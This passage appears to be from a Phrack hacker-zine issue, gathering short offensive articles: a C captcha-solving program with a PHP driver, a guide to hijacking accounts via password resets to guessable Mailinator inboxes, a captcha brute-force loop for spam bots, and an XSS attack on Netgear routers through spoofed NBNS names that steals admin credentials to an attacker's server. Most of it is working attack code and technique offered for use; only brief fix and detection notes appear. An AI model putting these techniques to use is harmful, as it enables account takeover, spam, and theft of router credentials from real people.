for (k=0;k<3;k++) {
|
|
captcha[i][0][k]=255;
|
|
captcha[i][119][k]=255;
|
|
}
|
|
for (d=0;d<120;d++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[0][d][k]=255;
|
|
captcha[39][d][k]=255;
|
|
}
|
|
/* Starts removing the noise */
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
|
|
captcha[i][d][2]>__COL)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
for (i=1;i<39;i++) {
|
|
for (d=1;d<119;d++) {
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[i][d][k]!=255)
|
|
t=1;
|
|
if (t) {
|
|
ti=i-1;
|
|
td=d-1;
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td+=2;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i+1;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
if (t<__MIN)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
void make_bw () {
|
|
int i,d;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]!=255)
|
|
bw[i][d]=1;
|
|
else
|
|
bw[i][d]=0;
|
|
}
|
|
|
|
void scan () {
|
|
int i,d,k,j,c,coord[6][2][2];
|
|
for (d=0,j=0,c=0;d<120;d++) {
|
|
for (i=0,k=0;i<40;i++)
|
|
if (bw[i][d])
|
|
k=1;
|
|
if (k && !j) {
|
|
j=1;
|
|
coord[c][0][0]=d;
|
|
}
|
|
else if (!k && j) {
|
|
j=0;
|
|
coord[c++][0][1]=d;
|
|
}
|
|
}
|
|
for (c=0;c<6;c++) {
|
|
coord[c][1][0]=-1;
|
|
coord[c][1][1]=-1;
|
|
for (i=0;(i<40 && coord[c][1][0]==-1);i++)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][0]=i;
|
|
break;
|
|
}
|
|
for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][1]=i;
|
|
break;
|
|
}
|
|
for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
|
|
for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
|
|
chars[c][j][k]=bw[i][d];
|
|
dim[c][0]=j;
|
|
dim[c][1]=k;
|
|
}
|
|
}
|
|
|
|
void read_pixels (int c) {
|
|
int i,d,k,r;
|
|
float arr[]={4,2,1.333333,1};
|
|
memset (bpix,0,8*sizeof(int));
|
|
for (k=0,i=0;k<4;k++) {
|
|
for (;i<(int)(dim[c][0]/arr[k]);i++) {
|
|
for (d=0;d<(int)(dim[c][1]/2);d++)
|
|
bpix[k][0] += chars[c][i][d];
|
|
for (;d<dim[c][1];d++)
|
|
bpix[k][1] += chars[c][i][d];
|
|
}
|
|
}
|
|
}
|
|
|
|
char cmp (int c) {
|
|
int i,d;
|
|
int err,n,min,min_i;
|
|
read_pixels (c);
|
|
for (i=0,min=-1;i<28;i++) {
|
|
n=abs(heights[i]-dim[c][0])*__HGT;
|
|
for (d=0;d<4;d++) {
|
|
n += abs(bpix[d][0]-table[i][0][d]);
|
|
n += abs(bpix[d][1]-table[i][1][d]);
|
|
}
|
|
if (min>n || min<0) {
|
|
min=n;
|
|
min_i = i;
|
|
}
|
|
}
|
|
return ch_list[min_i];
|
|
}
|
|
|
|
char *read_captcha (char *file) {
|
|
char *str;
|
|
int i;
|
|
str = malloc(7*sizeof(char));
|
|
load_image (file);
|
|
clear_noise ();
|
|
make_bw ();
|
|
scan ();
|
|
for (i=0;i<6;i++)
|
|
str[i]=cmp(i);
|
|
str[i]=0;
|
|
return str;
|
|
}
|
|
|
|
int main (int argc, char *argv[]) {
|
|
printf ("%s\n",read_captcha ("test.ppm"));
|
|
return 0;
|
|
}
|
|
|
|
Oh, if you want to have some fun and the staff is so kind as to leave
|
|
captcha.php (now captcha_old.php) you can run this PHP script:
|
|
|
|
<?
|
|
file_put_contents ("a.jpg",file_get_contents
|
|
("http://www.phrack.com/captcha_old.php"));
|
|
system ("convert -compress None a.jpg test.ppm");
|
|
system ("./captcha");
|
|
?>
|
|
|
|
I'm done, thanks for reading :)!
|
|
|
|
darkjoker - darkjoker93 _at_ gmail.com
|
|
|
|
|
|
|=[ 0x02 ]=---=[ The Dangers of Anonymous Email - DangerMouse ]=---------=|
|
|
|
|
|
|
In this digital world of online banking and cyber relationships there
exists an epidemic, known simply as SPAM.
The war on spam has been costly, with casualties on both sides. However,
mankind has finally developed the ultimate weapon to win the war...
email anonymizers!
|
|
|
|
Ok, so maybe this was a bit dramatic, but the truth is people are
|
|
getting desperate to rid themselves of the gigantic volumes of
|
|
unsolicited email which plagues their inbox daily. To combat this problem
|
|
many internet users are turning to email anonymizing services such as
|
|
Mailinator [1].
|
|
|
|
Sites like mailinator.com provide a domain where any keyword can be
|
|
created and appended as the username portion of an email address.
|
|
So for example, if you were to choose the username "trustno1", the email
|
|
address trustno1@mailinator.com could be used. Then the mailbox can be
|
|
accessed without a password at http://trustno1.mailinator.com. There is
|
|
no registration required to do this, and the email address can be created
|
|
at a whim. Obviously this can be used for a number of things. From a
|
|
hacker's perspective, it can be very useful to quickly create an anonymous
|
|
email address whenever one is needed. Especially one which can be checked
|
|
easily via a chain of proxies. Hell, combine it with an anonymous visa
|
|
gift card, and you've practically got a new identity.
|
|
|
|
For your typical spam-averse user, this can be an easy way to avoid
dealing with spam. One of the easiest ways to quickly gain an inbox
soaked in spam is to use your real email address to sign up to every
shiny new website which tickles your fancy. By creating a mailinator
account and submitting that instead, the user can visit the mailinator
website to retrieve the sign-up email. Since this is not the user's
regular email account, any spam sent to it is inconsequential.
|
|
|
|
The flaw with this, however, is that your typical user just isn't
creative enough to work with a system designed this way. When creating
a fresh anonymous email account for a new website, a typical user's
thought process goes something like this:
|
|
|
|
a) Look up at URL for name of site
|
|
b) Append said name to mailinator domain
|
|
c) ???
|
|
d) Profit
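
In other words, both the address and its inbox URL are trivially
predictable from the site name alone. A throwaway PHP sketch of steps (a)
and (b) (the host parsing is naive, and www.netflix.com is just an
example):

<?php
// Guess the mailinator address a lazy user would have signed up with.
// Purely illustrative; real users may of course pick other obvious names.
function guess_address($site_url) {
    $host  = parse_url($site_url, PHP_URL_HOST);   // e.g. www.netflix.com
    $parts = explode('.', $host);
    $name  = $parts[count($parts) - 2];            // "netflix"
    return array(
        'address' => $name . '@mailinator.com',
        'inbox'   => 'http://' . $name . '.mailinator.com',
    );
}

print_r(guess_address('http://www.netflix.com'));
?>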
|
|
|
|
This opens up a nice way for the internet's more shady characters to
|
|
quickly gain access to almost any popular website via the commonly
|
|
implemented "password reset" functionality.
|
|
|
|
But wait, you say. Surely you jest? No one could be capable of such
silly behavior on the internet!

Alas... Apparently Mike & Debra could.
|
|
|
|
"An email with instructions on how to access Your Account has been sent to
|
|
you at netflix@mailinator.com"
|
|
|
|
"Netflix password request
|
|
|
|
"Dear Mike & Debra,
|
|
We understand you'd like to change your password. Just click here and
|
|
follow the prompts. And don't forget your password is case sensitive."
|
|
|
|
;) ?
|
|
|
|
At least security folk would be immune to this you say! There's no way
|
|
that gmail@mailinator.com would allow one to reset 2600LA's mailing list
|
|
password...
|
|
|
|
As you can imagine it's easy to wile away some time with possible
|
|
targets ranging from popular MMO's to banking websites. Just make sure
|
|
you use a proxy so you don't have to phone them up and give them their
|
|
password back... *cough*
|
|
|
|
Have fun! ;)
|
|
|
|
--DangerMouse <Phrack@mailinator.com>
|
|
|
|
P.S. With the rise in the popularity of social networking websites
|
|
mailinator felt the need to go all web 2.0 by including a fancy list of
|
|
people who "Like" mailinator on Facebook. AKA a handy target list for a
|
|
bored individual with scripting skillz.
|
|
|
|
References:
|
|
[1] Mailinator: http://www.mailinator.com
|
|
[2] Netflix: http://www.netflix.com
|
|
|
|
|
|
|=[ 0x03 ]=---=[ Captchas Round 2 - phpc0derZ@phrack.org ]=--------------=|
|
|
|
|
[ Or why we suck even more ;> ]
|
|
|
|
Let's face it, our laziness got us ;-) So what's the story behind our
captcha? Ironically enough, the original script comes from this URL:
|
|
|
|
http://www.white-hat-web-design.co.uk/articles/php-captcha.php <-- :)))))))
|
|
|
|
8<----------------------------------------------------------------------->8
|
|
<?php
|
|
session_start();
|
|
|
|
/*
|
|
* File: CaptchaSecurityImages.php
|
|
* Author: Simon Jarvis
|
|
* Copyright: 2006 Simon Jarvis
|
|
* Date: 03/08/06
|
|
* Updated: 07/02/07
|
|
* Requirements: PHP 4/5 with GD and FreeType libraries
|
|
* Link: http://www.white-hat-web-design.co.uk/articles/php-captcha.php
|
|
*
|
|
* This program is free software; you can redistribute it and/or
|
|
* modify it under the terms of the GNU General Public License
|
|
* as published by the Free Software Foundation; either version 2
|
|
* of the License, or (at your option) any later version.
|
|
*
|
|
* This program is distributed in the hope that it will be useful,
|
|
* but WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
* GNU General Public License for more details:
|
|
* http://www.gnu.org/licenses/gpl.html
|
|
*
|
|
*/
|
|
|
|
|
|
class CaptchaSecurityImages {
|
|
|
|
var $font = 'monofont.ttf';
|
|
|
|
function generateCode($characters)
|
|
{
|
|
/* list all possible characters, similar looking characters and
|
|
* vowels have been removed */
|
|
$possible = '23456789bcdfghjkmnpqrstvwxyz'; $code = ''; $i = 0;
|
|
while ($i < $characters) {
|
|
$code .= substr($possible, mt_rand(0, strlen($possible)-1),1);
|
|
$i++;
|
|
}
|
|
return $code;
|
|
}
|
|
|
|
function CaptchaSecurityImages(
|
|
$width='120',
|
|
$height='40',
|
|
$characters='6')
|
|
{
|
|
$code = $this->generateCode($characters);
|
|
/* font size will be 75% of the image height */
|
|
$font_size = $height * 0.75;
|
|
$image = imagecreate($width, $height)
|
|
or die('Cannot initialize new GD image stream');
|
|
/* set the colours */
|
|
$background_color = imagecolorallocate($image, 255, 255, 255);
|
|
$text_color = imagecolorallocate($image, 20, 40, 100);
|
|
$noise_color = imagecolorallocate($image, 100, 120, 180);
|
|
/* generate random dots in background */
|
|
for( $i=0; $i<($width*$height)/3; $i++ ) {
|
|
imagefilledellipse($image,
|
|
mt_rand(0,$width),
|
|
mt_rand(0,$height),
|
|
1,
|
|
1,
|
|
$noise_color);
|
|
}
|
|
/* generate random lines in background */
|
|
for( $i=0; $i<($width*$height)/150; $i++ ) {
|
|
imageline($image,
|
|
mt_rand(0,$width),
|
|
mt_rand(0,$height),
|
|
mt_rand(0,$width),
|
|
mt_rand(0,$height),
|
|
$noise_color);
|
|
}
|
|
/* create textbox and add text */
|
|
$textbox = imagettfbbox($font_size,
|
|
0,
|
|
$this->font,
|
|
$code)
|
|
or die('Error in imagettfbbox function');
|
|
$x = ($width - $textbox[4])/2;
|
|
$y = ($height - $textbox[5])/2;
|
|
imagettftext($image,
|
|
$font_size,
|
|
0,
|
|
$x,
|
|
$y,
|
|
$text_color,
|
|
$this->font ,
|
|
$code)
|
|
or die('Error in imagettftext function');
|
|
/* output captcha image to browser */
|
|
header('Content-Type: image/jpeg');
|
|
imagejpeg($image);
|
|
imagedestroy($image);
|
|
$_SESSION['security_code'] = $code;
|
|
}
|
|
|
|
}
|
|
|
|
$width = isset($_GET['width']) && $_GET['width']<600?$_GET['width']:'120';
|
|
$height = isset($_GET['height'])&&$_GET['height']<200?$_GET['height']:'40';
|
|
$characters = isset($_GET['characters'])
|
|
&& $_GET['characters']>2?$_GET['characters']:'6';
|
|
|
|
$captcha = new CaptchaSecurityImages($width,$height,$characters);
|
|
|
|
?>
|
|
8<----------------------------------------------------------------------->8
|
|
|
|
The reason why this particular script was chosen is lost in the mists of
time, so let's focus on the code instead:
|
|
|
|
----[ 1 - Oops
|
|
|
|
OK so darkangel was right, the script is *really* poorly designed:
 -> The set of possible characters is limited to 28 characters
 -> The characters are inserted in the image using imagettftext()
    with (amongst other things) a fixed $font_size, a predictable
    position, etc.
 -> The noise itself is generated using lines and circles of the
    same color ($noise_color) which makes it trivial to remove.
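
To illustrate how trivial, here is a rough GD sketch (not part of any real
exploit chain; the thresholds are eyeballed to survive JPEG artifacts and
cap.jpg is just an arbitrary file name) that keeps only the pixels close to
the text colour (20,40,100) used above and paints everything else white:

<?php
$im    = imagecreatefromjpeg("cap.jpg");
$white = imagecolorallocate($im, 255, 255, 255);
for ($x = 0; $x < imagesx($im); $x++) {
    for ($y = 0; $y < imagesy($im); $y++) {
        $rgb = imagecolorat($im, $x, $y);
        $r   = ($rgb >> 16) & 0xFF;
        $b   = $rgb & 0xFF;
        /* text is (20,40,100), noise is (100,120,180), background is white */
        if ($r > 60 || $b < 80)
            imagesetpixel($im, $x, $y, $white);
    }
}
imagepng($im, "clean.png");
?>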
|
|
|
|
OK so we knew it was crappy, but there is even more. darkjoker's approach
can be seen as a dictionary attack applied once the noise has been removed.
There is something much simpler: since the characters are not distorted, we
can easily recover them with OCR software. Luckily there is a GNU one:
gocr. We tested it against images rendered with imagettftext() and, without
surprise ... it worked.
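
Reproducing the test takes a handful of lines (file names are arbitrary,
it assumes ImageMagick's convert plus gocr are installed, and no noise
removal is even attempted here):

<?php
file_put_contents("cap.jpg",
    file_get_contents("http://www.phrack.com/captcha_old.php"));
system("convert cap.jpg cap.pnm");   /* gocr is happier with PNM input */
system("gocr cap.pnm");              /* prints its best guess on stdout */
?>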
|
|
|
|
Hey man, it wasn't worth spending that much time :>
|
|
|
|
----[ 2 - Oops (bis)
|
|
|
|
We located two interesting things in the script and if you're a proficient
PHP reader then you've probably noticed them too... ;-)
|
|
|
|
a) The number of characters inserted in the image is user controlled.
If an attacker calls http://phrack.org/captcha.php?characters=x then
he can generate a captcha with x characters (any x > 2 passes the
check). This shouldn't be an issue by itself since captcha.php is
called by the server. However it becomes one because...
|
|
|
|
b) The script includes an interesting line:
|
|
$_SESSION['security_code'] = $code;
|
|
This clearly means that the PHP session will only keep track of
|
|
the *last* $code. While this is normal behavior (some captchas
aren't readable at all, so the user must be allowed to refresh),
it works to our advantage.
|
|
|
|
This gives us the opportunity to mount a new attack:
|
|
-> I'm a spam bot and I'm writing some shit comment about how big &
|
|
hard your penis will be when you will purchase my special pills. A
|
|
PHP session is created.
|
|
-> A captcha is loaded and because I'm a bot I can't fucking read it.
|
|
Too bad for me.
|
|
-> Within the same session I call captcha.php with ?characters=3 (the
smallest value the script accepts). With a probability of 1/(28*28*28)
I will be able to predict the generated code. I'll try as many times
as required until I'm right (a rough sketch of this loop is given
right after this list).
|
|
-> I will most likely succeed in the end and some poor desperate guy
|
|
may purchase the pills.
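
A bot-side sketch of that loop (target.example and post_comment() are
placeholders: the actual comment POST depends on the site being spammed,
and the cookie jar simply keeps us inside one PHP session):

<?php
function post_comment($curl, $code) {
    /* ... POST the spam form with security_code=$code here and
     * return true if the comment was accepted ... */
    return false;
}

$guess = "222";                  /* any fixed 3-char guess from the set */
$c = curl_init();
curl_setopt_array($c, array(
    CURLOPT_COOKIEJAR      => "jar",
    CURLOPT_COOKIEFILE     => "jar",
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_URL => "http://target.example/captcha.php?characters=3",
));

for ($try = 0; $try < 28*28*28; $try++) {
    curl_exec($c);               /* regenerates $_SESSION['security_code'] */
    if (post_comment($c, $guess))
        break;                   /* our fixed guess finally matched */
}
?>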
|
|
|
|
We've changed the captcha mechanism, the old one being captcha_old.php
|
|
|
|
----[ 3 - Conclusion
|
|
|
|
Who knows if spammers read Phrack? One thing is sure: the script is all
over the Internet... Yes, you should patch xD
|
|
|
|
|
|
|=[ 0x04 ]=---=[ XSS Using NBNS on a Home Router - Simon Weber ]=--------=|
|
|
|
|
|
|
--[ code is appended, but may not be the most recent. check:
|
|
https://github.com/simon-weber/XSS-over-NBNS
|
|
for the most recent version. ]--
|
|
|
|
--[ Contents
|
|
|
|
1 - Abstract
|
|
|
|
2 - Test Device Background
|
|
|
|
3 - Injection Chaining Technique
|
|
|
|
4 - Device Specific Exploits
|
|
4.1 - Steal Router Admin Credentials
|
|
4.2 - Hide a Device on the Network
|
|
|
|
5 - Tool
|
|
|
|
6 - Fix, Detection and Prevention
|
|
|
|
7 - Applications
|
|
|
|
8 - References
|
|
|
|
|
|
--[ 1 - Abstract
|
|
|
|
For routers which:
|
|
|
|
1) use NBNS to identify attached devices
|
|
2) list these devices on their web admin interface
|
|
3) do not sanitize the names they receive
|
|
|
|
there exists a 15 character injection vector on the web interface. This
|
|
vector can be exploited by anyone on the network, and will affect anyone
|
|
who visits a specific page on the web administration interface. Using
|
|
multiple injections in sequence separated with block comments, it is
|
|
possible to chain these injections to create a payload of arbitrary length.
|
|
This can be used to gain router admin credentials, steal cookies from an
|
|
admin, alter the view of attached devices, or perform any other XSS attack.
|
|
|
|
The real world application of the technique is limited by how often admins
|
|
are on the web interface. However, coupled with some social engineering,
|
|
small businesses such as coffee shops may be vulnerable.
|
|
|
|
--[ 2 - Test Device Background
|
|
|
|
I got a Netgear wgr614 v5 for less than $15 shipped on eBay. This is a
|
|
common home wireless B/G router. Originally released in 2004, its EOL was
|
|
about 5 years ago [1].
|
|
|
|
The web admin interface is pretty poorly built (sorry, Netgear!). If you
|
|
poke around, you'll find a lot of unescaped input fields to play with.
|
|
However, none of them can really be used to do anything interesting -
|
|
they're one time injection vectors that other users won't see.
|
|
|
|
However, there is one interesting page. This is the "attached devices" page
|
|
(DEV_devices.htm). It shows a table of what's connected to the router, and
|
|
looks something like this:
|
|
|
|
# Name IP MAC
|
|
1 computer_1 192.168.1.2 07:E0:17:8F:11:2F
|
|
2 computer_2 192.168.1.11 AF:3C:07:4D:B0:3A
|
|
3 -- 192.168.1.15 EB:3C:76:0F:67:43
|
|
|
|
This table is generated from the routing table, and the name is filled in
|
|
from NBNS responses to router requests. If a machine doesn't respond to
|
|
NBNS, takes too long to respond, or it gives an invalid name (over 15
|
|
characters or improperly terminated), the name is set to "--". The table is
|
|
refreshed in two ways: automatically by the router at an interval, and by a
|
|
user visiting or refreshing the page.
|
|
|
|
A quick test showed that the name in this table was unescaped. However,
|
|
this only gets us 15 characters of payload. I couldn't manage to squeeze a
|
|
reference to external code in just 15 characters (maybe someone else can?).
|
|
Executing arbitrary code will require something a bit more sophisticated.
|
|
|
|
--[ 3 - Injection Chaining Technique
|
|
|
|
The obvious way to get more characters for the payload is by chaining
|
|
together multiple injections. To do this, we need a few things:
|
|
|
|
1) A way to make multiple entries in the table:
|
|
This is easy, we just send out fake responses for IP/MAC
|
|
combinations that don't already exist on the network.
|
|
|
|
2) A way to control the order of our entries:
|
|
Also easy: the table orders by IP address. We'll just use a
|
|
range of incremental addresses that no one else is using.
|
|
|
|
3) A way to chain our entries around the other html:
|
|
Block comments will work for this. Our injections will just open
|
|
and close block comments at the end and beginning of their
|
|
reported names. For an illustration, imagine anything between <>
|
|
will be ignored on the page, and our name injections are
|
|
delimited with single quotes:
|
|
|
|
'[name 1] <' [ignored stuff]
|
|
[ignored stuff] '> [name 2] <' [ignored stuff]
|
|
... '> [name 3] <' ...
|
|
|
|
Great, that was easy. What kind of block comments can we use? How about
HTML's? This could work, but it has limitations. First off, -- or >
anywhere in the commented-out HTML will break things. Even if this did
work, we'd have to be careful about where we split things, and the comments
would take up about half of a 15 char name.
|
|
|
|
Javascript's c-style block comments are smaller and more flexible. They can
|
|
come anywhere in code, so long as it isn't the middle of a token. For
|
|
example,
|
|
|
|
document/* ignored */.write("something")
|
|
|
|
is fine, while
|
|
|
|
docu/* uh oh */ment.write("something")
|
|
|
|
breaks things.
|
|
|
|
We also just need to avoid */ in the commented out html, which should be
|
|
much less likely to pop up than >. To use javascript block comments, we'll
|
|
obviously need to use javascript to get our payload onto the page. Call it
|
|
our "payload transporter". This will work just fine:
|
|
|
|
"<script>document.write('[payload]');</script>"
|
|
|
|
So, then, the first thing to do is fit our transporter into 15 char chunks
|
|
to send as our first few fake NBNS names. Being careful not to split tokens
|
|
with comments, our first 3 names can be:
|
|
|
|
<script>/*
|
|
*/document./*
|
|
*/write(/*
|
|
|
|
This will open the write command to inject our payload. Now we need to
|
|
package the payload into the transporter in some more 15 char chunks. Since
|
|
strings are tokens, we can't split one big string with block comments. We
|
|
need to split up the payload into multiple strings and introduce more
|
|
tokens between them. To do this, I leveraged the fact that document.write
|
|
can take multiple arguments, which it will write in order - the commas that
|
|
split parameters will be our extra tokens. String concatenation would work,
|
|
too. So, our payload will be packaged into the transporter like:
|
|
|
|
'first part of payload', /*
*/ 'second part of payload', /*
*/ 'third part...', /*
...
*/ 'last part'); /*
|
|
|
|
It's easy to control the length of the strings to fit into the 15 char
|
|
length (we've just got to be careful about quotes in our payload). Lastly,
|
|
we just need to close the script tag, and we're done. We now have a way to
|
|
write an arbitrary length payload onto the attached devices page. Putting
|
|
it all together, here's an example of what our series of fake NBNS
|
|
responses could be if we wanted to get '<script>alert("test");</script>'
|
|
onto the page:
|
|
|
|
Spoofed NBNS Name IP MAC
|
|
<script>/* 192.168.1.111 00:00:00:00:00:01
|
|
*/document./* 192.168.1.112 00:00:00:00:00:02
|
|
*/write(/* 192.168.1.113 00:00:00:00:00:03
|
|
*/'<script>',/* 192.168.1.114 00:00:00:00:00:04
|
|
*/'alert(\'',/* 192.168.1.115 00:00:00:00:00:05
|
|
*/'test\');',/* 192.168.1.116 00:00:00:00:00:06
|
|
*/'</script',/* 192.168.1.117 00:00:00:00:00:07
|
|
*/'>');/* 192.168.1.118 00:00:00:00:00:08
|
|
*/</script> 192.168.1.119 00:00:00:00:00:09
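
Generating such a list of names is easy to automate. A rough PHP sketch
(naive on purpose: it assumes the payload contains no quotes or
backslashes and that no 8-character chunk happens to contain "</script"):

<?php
/* Turn an HTML payload into a list of <=15 character NBNS names chained
 * with JavaScript block comments, as described above. */
function nbns_names($payload) {
    $names = array('<script>/*', '*/document./*', '*/write(/*');
    foreach (str_split($payload, 8) as $chunk)  /* 7 wrapper chars + 8 = 15 */
        $names[] = "*/'" . $chunk . "',/*";
    $names[] = "*/'');/*";                      /* close the write() call */
    $names[] = '*/</script>';
    return $names;
}

print_r(nbns_names('<img src=x onerror=alert(1)>'));
?>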
|
|
|
|
There are a few other practical considerations that I found while working
|
|
with my specific Netgear router. It will use the most recent information it
|
|
has for device names. This means that we have to send our payload every
|
|
time that requests are sent out. It also means that for some time after we
|
|
stop injecting, the device listing is going to have a number of '--'
|
|
entries; the router is expecting to get names for these devices but sees no
|
|
response. To hide our tracks, we could reboot the router when finished
|
|
(this is possible by either injection or after stealing admin credentials,
|
|
which is detailed below).
|
|
|
|
We also have to be careful that a legitimate device doesn't come on to the
|
|
network with one of our spoofed IPs or MACs. This could possibly break our
|
|
injection, depending on the timing of responses.
|
|
|
|
One last thing to keep in mind: the NBNS packets need to get on the wire
|
|
quickly, since the router only listens for NBNS responses for a short time.
|
|
Thus, smaller payloads (which fit into less packets) are more likely to
|
|
succeed. You'll want to create external javascript to do any heavy lifting,
|
|
and just inject code to run it. When a payload fails, earlier packets will
|
|
get there and others won't, leaving garbage in the attached devices list.
|
|
|
|
--[ 4 - Device Specific Exploits
|
|
|
|
Naturally, anything that can be done with XSS or javascript is fair game.
|
|
You can attack the user (cookie stealing), the router (injected requests to
|
|
the web interface are now authed), or the page itself. I created a few
|
|
interesting examples that are specific to the Netgear device I had.
|
|
|
|
------[ 4.1 - Steal Router Admin Credentials
|
|
|
|
On the admin interface, there is an option to backup and restore the router
|
|
settings. It generates a simple flat file database called netgear.cfg. This
|
|
file itself is actually rather interesting. It seems to be a plaintext
|
|
memory dump, guarded from manipulation by a checksum that I couldn't figure
|
|
out (no one has cracked it as of the time this was written - if you do, let
|
|
me know). In it, you'll find everything from wireless keys to static routes
|
|
to - surprise - plaintext administrator information. This includes
|
|
usernames and passwords for both the http admin and telnet super admin (see
|
|
[3] for information on the hidden telnet console).
|
|
|
|
It's easy to steal this file via XSS in the same way that cookies are
|
|
stolen. The attacker first sets up a listening http server to receive the
|
|
information. Then, the injection code simply GETs the file and sends it off
|
|
to the listening server.
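
The collector does not need to be fancy; a single hypothetical PHP page
would do just as well as a custom server (the "data" parameter and the
file naming below are made up):

<?php
/* The injected JavaScript fetches netgear.cfg and ships it here, e.g.
 * base64'd in a "data" parameter or as a raw POST body. */
$dump = isset($_REQUEST['data']) ? base64_decode($_REQUEST['data'])
                                 : file_get_contents('php://input');
file_put_contents('netgear-' . time() . '.cfg', $dump);
?>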
|
|
|
|
With admin access to the router, the attacker can do all sorts of things.
|
|
Basic traffic logging is built-in, and can even be emailed out
|
|
automatically. DoS is possible through the router's website blocking
|
|
functions. Man in the middle attacks are possible through the exposed dhcp
|
|
dns, static routing and internet connection configuration options.
|
|
|
|
------[ 4.2 - Hide a Device on the Network
|
|
|
|
The only place that an admin can get information about who is on the
|
|
network is right on the page we inject to. Manipulating the way the device
|
|
list is displayed could provide simple counter-detection against a
|
|
suspicious administrator.
|
|
|
|
For this exploit, we inject javascript to iterate through the table and
|
|
remove any row that matches a device we're interested in. Then, the table
|
|
is renumbered. Note that we don't have to own the device to remove it from
|
|
the list.
|
|
|
|
Going one step further, the attacker can bolster the cloak of invisibility.
|
|
Blocking connections not originating from the router is an obvious choice.
|
|
It might be wise to block pings directly from the router as well.
|
|
|
|
--[ 5 - Tool
|
|
|
|
I used Scapy with Python to implement the technique and exploits described
|
|
above and hosted it on Github [2]. You can also specify a custom exploit
|
|
that will be packaged and sent using my chaining technique. I also made a
|
|
simple python http server to listen for stolen admin credentials and serve
|
|
up external exploit code. Credit goes to Robert Wesley McGrew for NBNSpoof;
|
|
I reused some of his code [4].
|
|
|
|
To combat the problem I described earlier about sending packets quickly, I
|
|
listen for the first request from the router and precompute the response
|
|
packets to send. These will be sent as responses to any other requests
|
|
sniffed. You'll notice this if you use my tool; a "ready to inject" message
|
|
will be printed after the responses are generated.
|
|
|
|
If you look at my built-in exploits, you'll see they each use a loadhelp2
|
|
function as the entry point. This is just an easy way to get them to run
|
|
when the page is loaded. The router declares the loadhelp function
|
|
externally, and runs it on page load; I declare it on the page (so my
|
|
version is actually used), and use it to launch my external loadhelp2 code.
|
|
Then, the original code is patched on to the end, so the user doesn't
|
|
notice.
|
|
|
|
--[ 6 - Fix, Detection and Prevention
|
|
|
|
To close the hole, Netgear would only need to change some web backend code
|
|
in the firmware to escape NBNS names. I contacted Netgear about this. They
|
|
won't make a fix for this specific model - it already saw its support EOL -
|
|
but they are checking their newer models for this flaw as of September 2011
|
|
[1].
|
|
|
|
So, if you have this router, know that a fix isn't coming. While it may be
|
|
difficult to initially detect that a device you own is being attacked, once
|
|
you suspect it there are simple ways to verify it:
|
|
|
|
 - check the source of the affected page; you'll see the commented-out
   device entries with suspicious names

 - use the hidden telnet interface. This will show the many fake IPs
   that are generated when packing a payload.

 - as a last resort, watch network traffic for malformed NBNS names
|
|
|
|
Also, keep in mind that you can only be affected when checking your
|
|
router's configuration. You could protect yourself completely by never
|
|
visiting the web administration interface.
|
|
|
|
--[ 7 - Applications
|
|
|
|
Of course, this technique's practical application is limited to how often
|
|
users check their router admin pages. However, when coupled with some
|
|
social engineering, I could imagine a vulnerability for small businesses
|
|
like coffee shops.
|
|
|
|
These locations commonly offer wireless using off-the-shelf hardware like
|
|
my Netgear router. Getting on their network is easy - it's already open. At
|
|
this point, the attacker starts the exploit, then convinces an employee to
|
|
check the admin pages (maybe "I'm having some strange issues with the
|
|
wireless...Can you check on the router and see if my device is showing
|
|
up?"). I'm sure a practiced social engineer would have no trouble pulling
|
|
this off.
|
|
|
|
As far as applying this beyond the home networking realm, a good place to
|
|
start would be investigating this technique on other routers or better
|
|
firmwares like DD-WRT or Tomato. That would at least determine if this is a
|
|
common flaw. I didn't have another device to play with (the wgr614v5
|
|
doesn't work with other firmware), so I'll leave it for someone else to
|
|
try.
|
|
|
|
I'm doubtful that other applications very different from what I described
|
|
exist. Router administration pages simply aren't viewed very much. However,
|
|
the broader idea of XSS through spoofed NBNS names might be applicable to a
|
|
different domain. Anywhere there is a listing of NBNS names, there is the
|
|
possibility of an injection vector.
|
|
|
|
--[ 8 - References
|
|
|
|
[1] private communication with Netgear, September 2011
|
|
[2] https://github.com/simon-weber/XSS-over-NBNS
|
|
[3] http://www.seattlewireless.net/NetgearWGR614#TelnetConsole
|
|
[4] http://www.mcgrewsecurity.com/tools/nbnspoof/
|
|
|
|
|
|
October 2011
|
|
Simon Weber
|
|
sweb090 _at_ gmail.com
|
|
|
|
|
|
|
|
|=[ 0x05 ]=---=[ Hacking the Second Life Viewer For Fun & Profit - Eva ]-=|
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=------------------------=[ 01110010011000010110 ]=---------------------=|
|
|
|=------------------------=[ 01100110010101101110 ]=---------------------=|
|
|
